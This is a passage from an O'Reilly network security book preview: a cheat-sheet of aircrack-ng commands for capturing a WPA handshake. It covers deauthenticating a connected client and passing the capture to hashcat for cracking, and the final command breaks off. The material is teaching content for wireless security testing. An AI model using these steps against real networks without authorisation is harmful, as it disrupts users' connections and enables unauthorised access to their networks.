The short version (a cheat-sheet for the aircrack-ng suite)

  1. Open a Terminal and type the following commands:
      > "airmon-ng"  
      > "airmon-ng start wlan0"  
      > "ifconfig wlan0mon down"  
      > "iwconfig wlan0mon mode monitor" 
      > "ifconfig wlan0mon up"  
      > "airodump-ng wlan0mon"
  1. Now pick a wireless interface | copy the SSID:
      > "airodump-ng --bssid 00:22:33:FF:AB:CD -c 11 --write CrackWPA
      wlan0mon"
  1. Send a deauth to one of the devices connected:
       > "aireplay-ng --deauth 10 -a 01:02:ab:03:04:ff -c
       10:03:cd:04:06:fe wlan0mon" 
       > "cp CrackWPA-01.cap /root/Desktop/" 
       > "cd Desktop/"  
       > "wpaclean CrackFile.cap CrackWPA-01.cap" 
       > "aircrack-ng CrackFile.cap -J wpacrack"
  1. Press Ctrl + Z (to exit):
 > "hashcat -m 2500 /root/Desktop/wpacrack.hccap ...

Get Applied Network Security now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.